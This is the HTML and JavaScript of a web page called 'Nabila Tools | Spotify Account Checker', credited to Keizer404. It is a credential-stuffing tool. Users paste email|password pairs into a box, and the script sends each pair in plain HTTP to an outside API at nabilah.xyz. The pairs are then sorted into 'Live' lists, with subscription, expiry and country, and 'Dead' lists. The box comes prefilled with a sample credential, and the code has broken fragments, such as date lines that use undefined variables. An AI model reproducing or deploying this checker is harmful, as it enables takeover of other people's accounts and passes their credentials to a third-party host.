<head title="Nabila Tools">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>- Nabila Tools | Spotify Account Checker</title><link rel="shortcut icon" href="http://www.sbsseh.com/cek/nabila.jpg">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="og:image" content="http://www.sbsseh.com/cek/nabila.jpg"/>
<meta http-equiv="expires" content="0">
<meta http-equiv="Content-Language" content="en-us">
<link rel="shortcut icon" href="http://www.sbsseh.com/cek/nabila.jpg" type="image/x-icon" />
<meta name="distribution" content="Global">
<meta name="rating" content="General">
<link rel="stylesheet" type="text/css" href="../../assets/css/css/sweet/dist/sweetalert.css">
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="css/bootstrap-theme.css" rel="stylesheet">
<link href="css/bootstrap-theme.min.css" rel="stylesheet"></head><body>
<nav class="navbar navbar-default">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only"> Toggle navigation </span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="/">
<font style="font-family: Kreizer404;">Nabila Tools</font></a></div><div id="navbar" class="navbar-collapse collapse"><ul class="nav navbar-nav navbar-right">
<li class="active"><a href="../../../">Home</a></li></ul></nav></nav><div class="panel-heading"><div class="panel panel-primary panelMove toggle panelRefresh panelClose"><div class="panel-heading">
<h4 class="panel-title">Spotify Account Checker</h4></div><div class="panel-body">
<div class="alert alert-success">
<button type="button" class="close" data-dismiss="alert">x</button>
<b>Note: </b>Check login, Type Akun</div>
</head>
<body class="fixed-left">
<div id="wrapper">

<center> 
  <div class="alert alert-info" id="done_div" hidden>

                </div>
    <div class="clearfix"></div>
    <div class="wrapper-page">
   
	<br id="lol">
	<br id="lol">
        <div class="m-t-40 card-box">
            <div class="text-center">
              
                
        
                
	</div>
            <div class="panel-body">

              
                <h3>Created by Keizer404<h3>
                <textarea class="form-control" id="tocheck_acc" style="resize: none;vertical-align:middle;" col="95" rows="5" >nbl.ayu@gmail.com|p4ssw0rd</textarea>

<br>

                <h3>Live:</h3>
                <textarea class="form-control" id="live_acc" style="resize: none;vertical-align:middle;" col="95" rows="5" ></textarea>
               <br> <h3 class="color-8">Dead:</h3>
                <textarea class="form-control" id="dead_acc" style="resize: none;vertical-align:middle;" col="95" rows="5" ></textarea>
    <div class="buttons">
	<container>
  <row>
			  <columns small="12" large="6">
                        <button type="button" onclick="parse_accounts();" class="left btn-hover color-8">Check</button>
                    </columns>
                <columns small="12" large="6">
 </div>
 </columns>
</div>
</container>
  </row>

            </div>
        </div>
    </div>
</div>


<!-- jQuery and Bootstrap -->
	<script src="js/bootstrap.min.js"></script>
	<script src="js/jquery.min.js"></script>


<script type="text/javascript">
var clipboard = new Clipboard('.cpy');
    function parse_accounts(){
        var accounts = $("#tocheck_acc")[0].value;
        accounts = accounts.split("\n");
        accounts.forEach(check);
        $("#done_div")[0].hidden = false;
        $("#done_div")[0].innerHTML = "<strong>Check done</strong>";
		$("#cpy")[0].hidden = false;
		$("#lol")[0].hidden = true;
    }
	var d = new Date();
var d = new Date(dateString);
var d = new Date(year, month, day, hours, minutes, seconds);
    function check(account){
        var account = account.split("|");
        var username = account[0];
        var password = account[1];
        $.get( "http://nabilah.xyz/api/?email=" + username + "&pass=" + password, function( data ) {
            var result_decoded = JSON.parse(data);
            if(result_decoded.status == "success") {
                $("#live_acc")[0].value = $("#live_acc")[0].value +  username + "|" + password + " | " + result_decoded.subscription + " | " + result_decoded.Berlaku + " | " + result_decoded.Negara + " #nblh_tools\n";
  $("#live_acc")[0].value +  " Checked on Nabila Tools " + d        } else {
                $("#dead_acc")[0].value = $("#dead_acc")[0].value +  username + "|" + password + "\n";
            }
        });
    }
</script>


</body>

</html>